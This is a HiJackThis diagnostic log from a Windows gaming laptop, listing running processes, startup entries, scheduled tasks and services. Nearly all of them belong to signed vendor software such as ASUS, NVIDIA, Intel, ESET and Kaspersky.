 1 C:\Program Files\ASUS\AacAmbientHal\AacAmbientLighting.exe
 1 C:\Program Files\ASUS\ROG Live Service\ROGLiveService.exe
 1 C:\Program Files\ESET\ESET Security\efwd.exe
 1 C:\Program Files\ESET\ESET Security\eguiProxy.exe
 1 C:\Program Files\ESET\ESET Security\ekrn.exe
 13 C:\Program Files\Google\Chrome\Application\chrome.exe
 1 C:\Program Files\LGHUB\lghub_agent.exe
 1 C:\Program Files\LGHUB\lghub_updater.exe
 1 C:\Program Files\LGHUB\system_tray\lghub_system_tray.exe
 1 C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe
 1 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
 1 C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
 4 C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
 5 C:\Program Files\NVIDIA Corporation\NVIDIA app\CEF\NVIDIA Overlay.exe
 1 C:\Program Files\NVIDIA Corporation\NVIDIA app\ShadowPlay\nvsphelper64.exe
 1 C:\Program Files\Riot Vanguard\vgtray.exe
 1 C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.144.0_x64__97hta09mmv6hy\Build\Lively.exe
 1 C:\Program Files\WindowsApps\12030rocksdanister.LivelyWallpaper_1.0.144.0_x64__97hta09mmv6hy\Build\Plugins\Mpv\mpv.exe
 1 C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2509.4.0_x64__cv1g1gvanyjgm\WhatsApp.exe
 6 C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.137.3425.0_x64__kzf8qxf38zg5c\Skype\Skype.exe
 1 C:\Program Files\WindowsApps\Microsoft.WidgetsPlatformRuntime_1.6.2.0_x64__8wekyb3d8bbwe\WidgetService\WidgetService.exe
 1 C:\Program Files\WindowsApps\Microsoft.YourPhone_1.25021.67.0_x64__8wekyb3d8bbwe\PhoneExperienceHost.exe
 1 C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_525.5100.30.0_x64__cw5n1h2txyewy\Dashboard\Widgets.exe
 1 C:\Program Files\WindowsApps\MicrosoftWindows.CrossDevice_1.25021.28.0_x64__cw5n1h2txyewy\CrossDeviceService.exe
 1 C:\ProgramData\ASUS\AsusSurvey\AsusSurvey.exe
 1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MpDefenderCoreService.exe
 1 C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25010.11-0\MsMpEng.exe
 1 C:\Users\eymen\Downloads\HiJackThis.exe
 1 C:\Windows\explorer.exe
 1 C:\Windows\ImmersiveControlPanel\SystemSettings.exe
 1 C:\Windows\System32\AggregatorHost.exe
 1 C:\Windows\System32\ApplicationFrameHost.exe
 1 C:\Windows\System32\ASUSACCI\ArmouryCrateControlInterface.exe
 1 C:\Windows\System32\ASUSACCI\ArmouryCrateKeyControl.exe
 1 C:\Windows\System32\audiodg.exe
 2 C:\Windows\System32\backgroundTaskHost.exe
 1 C:\Windows\System32\cmd.exe
 1 C:\Windows\System32\conhost.exe
 2 C:\Windows\System32\csrss.exe
 1 C:\Windows\System32\ctfmon.exe
 2 C:\Windows\System32\dllhost.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asusptpfilter.inf_amd64_1e467870260bcd2f\AsusPTPService.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\AsusAppService\AsusAppService.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSOptimization\AsusOptimization.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSOptimization\AsusOptimizationStartupTask.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSOptimization\AsusOSD.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSoftwareManager\AsusSoftwareManager.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSoftwareManager\AsusSoftwareManagerAgent.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSwitch\AsusSwitch.exe
 2 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemAnalysis\AsusSystemAnalysis.exe
 1 C:\Windows\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
 1 C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_b5484efd38adbe8d\jhi_service.exe
 1 C:\Windows\System32\DriverStore\FileRepository\DAX3_S~2.INF\DAX3API.exe
 1 C:\Windows\System32\DriverStore\FileRepository\dax3_swc_aposvc.inf_amd64_8e54c1bc7d581ad1\DAX3API.exe
 1 C:\Windows\System32\DriverStore\FileRepository\dtt_sw.inf_amd64_12a05294eb98ea3c\ipfsvc.exe
 1 C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_a687edda40db3316\OneApp.IGCC.WinService.exe
 1 C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_ffe7d9986336312b\IntelCpHDCPSvc.exe
 1 C:\Windows\System32\DriverStore\FileRepository\intcoed.inf_amd64_6f0a892deb241071\AS\IAS\IntelAudioService.exe
 1 C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_15575ddcbffc1fc6\ipf_helper.exe
 1 C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_15575ddcbffc1fc6\ipf_uf.exe
 1 C:\Windows\System32\DriverStore\FileRepository\logi_lamparray_usb.inf_amd64_3786a31d1dad269d\logi_lamparray_service.exe
 1 C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_d51901c26227fb29\WMIRegistrationService.exe
 2 C:\Windows\System32\DriverStore\FileRepository\nvami.inf_amd64_138dcebfe5992a47\Display.NvContainer\NVDisplay.Container.exe
 1 C:\Windows\System32\DriverStore\FileRepository\piecomponent.inf_amd64_ee1169deb7ec6a42\Intel_PIE_Service.exe
 2 C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_55047240f73a1fa6\RtkAudUService64.exe
 1 C:\Windows\System32\dwm.exe
 2 C:\Windows\System32\fontdrvhost.exe
 1 C:\Windows\System32\LsaIso.exe
 1 C:\Windows\System32\lsass.exe
 1 C:\Windows\System32\NgcIso.exe
 1 C:\Windows\System32\oobe\UserOOBEBroker.exe
 10 C:\Windows\System32\RuntimeBroker.exe
 1 C:\Windows\System32\SearchFilterHost.exe
 1 C:\Windows\System32\SearchIndexer.exe
 1 C:\Windows\System32\SearchProtocolHost.exe
 1 C:\Windows\System32\SecurityHealthService.exe
 1 C:\Windows\System32\SecurityHealthSystray.exe
 1 C:\Windows\System32\services.exe
 1 C:\Windows\System32\ShellHost.exe
 1 C:\Windows\System32\sihost.exe
 1 C:\Windows\System32\smartscreen.exe
 1 C:\Windows\System32\smss.exe
 1 C:\Windows\System32\spoolsv.exe
 89 C:\Windows\System32\svchost.exe
 2 C:\Windows\System32\taskhostw.exe
 2 C:\Windows\System32\wbem\unsecapp.exe
 3 C:\Windows\System32\wbem\WmiPrvSE.exe
 1 C:\Windows\System32\wininit.exe
 1 C:\Windows\System32\winlogon.exe
 1 C:\Windows\System32\wlanext.exe
 3 C:\Windows\System32\WUDFHost.exe
 1 C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\CHXSmartScreen.exe
 1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
 1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
 1 C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
 1 C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
 1 C:\Windows\TbtP2pShortcutService.exe
 1 C:\Windows\ThunderboltService.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = hxxp://vvv.joygame.com/games.aspx?g=2001
O2-32 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_441\bin\jp2ssv.dll (sign: 'Oracle America, Inc.')
O2-32 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_441\bin\ssv.dll (sign: 'Oracle America, Inc.')
O4 - ActiveSetup: HKLM\..\{8A69D345-D564-463c-AFF1-A69D9E530F96}: [StubPath] = C:\Program Files\Google\Chrome\Application\134.0.6998.89\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level --channel=stable (sign: 'Google LLC')
O4 - HKCU\..\Run: [EpicGamesLauncher] = C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe -silent -launchcontext=boot (sign: 'Epic Games Inc.')
O4 - HKCU\..\Run: [LGHUB] = C:\Program Files\LGHUB\system_tray\lghub_system_tray.exe --minimized (sign: 'Logitech Inc')
O4 - HKCU\..\Run: [MicrosoftEdgeAutoLaunch_E3D834145B9E086748646FF8637E21CC] = C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --no-startup-window --win-session-start (sign: 'Microsoft')
O4 - HKCU\..\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent (sign: 'Valve Corp.')
O4 - HKCU\..\StartupApproved\Run: [RiotClient] = C:\Riot Games\Riot Client\RiotClientServices.exe --launch-background-mode (2025/03/03) (sign: 'Riot Games, Inc.')
O4 - HKLM\..\Run: [egui] = C:\Program Files\ESET\ESET Security\ecmds.exe /run /hide /proxy (sign: 'ESET, spol. s r.o.')
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe (sign: 'Riot Games, Inc.')
O4 - HKU\S-1-5-19\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Local service') (sign: 'Microsoft')
O4 - HKU\S-1-5-20\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Network service') (sign: 'Microsoft')
O4-32 - HKLM\..\Run: [SunJavaUpdateSched] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (sign: 'Oracle America, Inc.')
O17 - DHCP DNS 1: 192.168.1.1
O18 - HKLM\Software\Classes\Protocols\Filter\application/octet-stream: [CLSID] = {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-complus: [CLSID] = {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - (no file)
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-msdownload: [CLSID] = {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive7: (no name) - {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} - (no file)
O22 - BITS Job: (download) {35B8E922-B052-4E37-A7F9-E8F4EDFD7994} - hxxps://oneclient.sfx.ms/Win/Installers/25.015.0126.0002/amd64/OneDriveSetup.exe -> C:\Users\eymen\AppData\Local\Temp\wct6522.tmp
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\WINDOWS\explorer.exe (sign: 'Microsoft')
O22 - Tasks: (damaged) AsusSystemAnalysis_754F3273-0563-4F20-B12F-826510B07474 - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemAnalysis\AsusSystemAnalysis.exe -j0 (user missing) (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical - {613FBA38-A3DF-4AB8-9674-5604984A299A},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical - {DE434264-8FE9-4C0B-A83B-89EBEEBFF78E},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Flighting\FeatureConfig\BootstrapUsageDataReporting - {D759C938-B375-41CB-A2A2-E6D866A767F4} - C:\Windows\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\DetectHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},DetectHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\RemediateHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},RemediateHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\MdmDiagnosticsCleanup - C:\WINDOWS\system32\MdmDiagnosticsTool.exe /clean (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Servicing\OOBEFodSetup - C:\WINDOWS\system32\OOBEFodSetup.exe (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\SharedPC\Account Cleanup - {7750564D-D61C-4557-8A9D-7DF56BDCFF96} - C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Shell\ThemeAssetTask_SyncFODState - {3BC5DD7D-EA3B-428C-B9B6-0723DB6A1057} - C:\Windows\System32\Windows.UI.Immersive.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aemarebackup.dll -f:BackupMareData (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - C:\WINDOWS\system32\sc.exe start InventorySvc (sign: '')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser Exp - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun express (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\SdbinstMergeDbTask - C:\WINDOWS\system32\sdbinst.exe -mm (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Sustainability\SustainabilityTelemetry - {6EE41D75-D091-4FB7-9AD5-018760DD25D4} - C:\WINDOWS\system32\EcoScoreTask.dll (sign: 'Microsoft')
O22 - Tasks: \ASUS\AcPowerNotification - C:\Program Files (x86)\ASUS\ArmouryDevice\dll\AcPowerNotification\AcPowerNotification.exe (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: \ASUS\ArmourySocketServer - C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ArmourySocketServer\ArmourySocketServer.exe (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: \ASUS\ASUSUpdateTaskMachineCore1db86dea72d54aa - C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe /c (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: \ASUS\ASUSUpdateTaskMachineUA - C:\Program Files (x86)\ASUS\Update\AsusUpdate.exe /ua /installsource scheduler (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: \ASUS\Framework Service - C:\Program Files (x86)\ASUS\ArmouryDevice\asus_framework.exe --delay (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: \ASUS\P508PowerAgent_sdk - C:\Program Files (x86)\ASUS\ArmouryDevice\dll\ShareFromArmouryIII\Mouse\ROG STRIX CARRY\P508PowerAgent.exe (file missing)
O22 - Tasks: \GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem135.0.7023.0{74209AC5-BBC1-4D64-A55D-35EC1AD96F77} - C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe --wake --system (sign: 'Google LLC')
O22 - Tasks: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 - {84F0FAE1-C27B-4F6F-807B-28CF6F96287D},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 - {429BC048-379E-45E0-80E4-EB1977941B5C},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Diagnosis\UnexpectedCodepath - C:\WINDOWS\system32\UCConfigTask.exe (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Flighting\FeatureConfig\ReconcileConfigs - {15F5ECE1-4550-4A92-8E26-984FD1DA54FA} - C:\WINDOWS\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Flighting\FeatureConfig\UsageDataReceiver - {D4C0420F-76BD-4F66-A91F-918A93ABEBEB} - C:\Windows\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemoteMouseSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemoteMouseSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemotePenSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemotePenSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemoteTouchpadSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemoteTouchpadSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Network Connectivity Status Indicator\NcsiIdentifyUserProxies - {706B965A-8308-4CD4-9900-87C2D79C121B} - C:\Windows\System32\netprofm.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\PerformanceTrace\RequestTrace - {9EFEB182-2EE3-4AF9-AFFA-521410D110D1} - C:\WINDOWS\system32\PerformanceTraceHandler.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\ReFsDedupSvc\Initialization - {DCFF735B-64F7-45F3-B39C-6C66BBE2120F} - C:\WINDOWS\System32\ReFsDedupSvc.exe (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Sustainability\PowerGridForecastTask - {251E5B1F-E370-4E12-B5BD-B7AD2A8EE810} - C:\WINDOWS\system32\PowerGridForecastTask.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\TPM\Tpm-PreAttestationHealthCheck - {5014B7C8-934E-4262-9816-887FA745A6C4},TpmPreAttestationHealthCheck - C:\WINDOWS\system32\TpmTasks.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\UIEOrchestrator - C:\WINDOWS\system32\UIEOrchestrator.exe /SendHeartbeat (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker - C:\WINDOWS\system32\MusNotification.exe (file missing)
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\UUS Failover Task - C:\WINDOWS\System32\MLEngineStub.exe HandleUusFailoverEvaluationSignalFromWnf (sign: 'Microsoft')
O22 - Tasks: ASUS Optimization 36D18D69AFC3 - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSOptimization\AsusHotkey.exe -CancelShutdown (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: ASUS Update Checker 2.0 - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSoftwareManager\AsusUpdateChecker.exe (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: AsusSystemAnalysis_754F3273-0563-4F20-B12F-826510B07474 - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemAnalysis\AsusSystemAnalysis.exe -j0 (sign: 'ASUSTeK COMPUTER INC.')
O22 - Tasks: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky\upgrade_launcher.exe /waitUpgrade (sign: 'AO Kaspersky Lab')
O22 - Tasks: NVIDIA app SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} - C:\Program Files\NVIDIA Corporation\NVIDIA app\CEF\NVIDIA app.exe (sign: 'NVIDIA Corporation')
O22 - Tasks: PostponeDeviceSetupToast_S-1-5-21-477160831-1423351159-3301466732-1001_0 - {5ded83ef-1e99-48cf-bf83-676d2a6db408},PostponeDeviceSetupToast - C:\Windows\System32\oobe\UserOOBE.dll (file missing)
O22 - Tasks: RtkAudUService64_BG - C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_55047240f73a1fa6\RtkAudUService64.exe -background (sign: 'Realtek Semiconductor Corp.')
O23 - Service R2: Armoury Crate Control Interface - (ArmouryCrateControlInterface) - C:\WINDOWS\System32\ASUSACCI\ArmouryCrateControlInterface.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS App Service - (AsusAppService) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\AsusAppService\AsusAppService.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS AURA SYNC lighting service - (LightingService) - C:\Program Files (x86)\LightingService\LightingService.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: Asus Certificate Service - (AsusCertService) - C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS Optimization - (ASUSOptimization) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSOptimization\AsusOptimization.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS Software Manager - (ASUSSoftwareManager) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSoftwareManager\AsusSoftwareManager.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS Switch - (ASUSSwitch) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSwitch\AsusSwitch.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS System Analysis - (ASUSSystemAnalysis) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemAnalysis\AsusSystemAnalysis.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: ASUS System Diagnosis - (ASUSSystemDiagnosis) - C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_f57c48cf404ebc46\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: AsusPTPService - C:\WINDOWS\System32\DriverStore\FileRepository\asusptpfilter.inf_amd64_1e467870260bcd2f\AsusPTPService.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: Dolby DAX API Service - (DolbyDAXAPI) - C:\WINDOWS\System32\DriverStore\FileRepository\dax3_swc_aposvc.inf_amd64_8e54c1bc7d581ad1\DAX3API.exe (sign: 'Dolby Laboratories, Inc.')
O23 - Service R2: ESET Forwarder - (efwd) - C:\Program Files\ESET\ESET Security\efwd.exe (sign: 'ESET, spol. s r.o.')
O23 - Service R2: ESET Service - (ekrn) - C:\Program Files\ESET\ESET Security\ekrn.exe (sign: 'ESET, spol. s r.o.')
O23 - Service R2: GameSDK Service - C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe (sign: 'ASUSTeK COMPUTER INC.')
O23 - Service R2: Intel(R) Audio Service - (IntelAudioService) - C:\WINDOWS\System32\DriverStore\FileRepository\intcoed.inf_amd64_6f0a892deb241071\\AS\\IAS\\IntelAudioService.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Content Protection HDCP Service - (cplspcon) - C:\WINDOWS\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_ffe7d9986336312b\IntelCpHDCPSvc.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Dynamic Application Loader Host Interface Service - (jhi_service) - C:\WINDOWS\System32\DriverStore\FileRepository\dal.inf_amd64_b5484efd38adbe8d\jhi_service.exe (sign: 'Intel(R) Embedded Subsystems and IP Blocks Group')
O23 - Service R2: Intel(R) Dynamic Tuning Technology Telemetry Service - (dptftcs) - C:\WINDOWS\System32\DriverStore\FileRepository\dtt_sw.inf_amd64_12a05294eb98ea3c\ipfsvc.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Graphics Command Center Service - (igccservice) - C:\WINDOWS\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_a687edda40db3316\OneApp.IGCC.WinService.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Innovation Platform Framework Service - (ipfsvc) - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_15575ddcbffc1fc6\ipf_uf.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Management Engine WMI Provider Registration - (WMIRegistrationService) - C:\WINDOWS\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_d51901c26227fb29\WMIRegistrationService.exe (sign: 'Intel Corporation')
O23 - Service R2: Kaspersky Hizmeti 21.20 - (AVP21.20) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky 21.20\avp.exe -r (sign: 'Kaspersky Lab JSC')
O23 - Service R2: LGHUB Updater Service - (LGHUBUpdaterService) - C:\Program Files\LGHUB\lghub_updater.exe --run-as-service (sign: 'Logitech Inc')
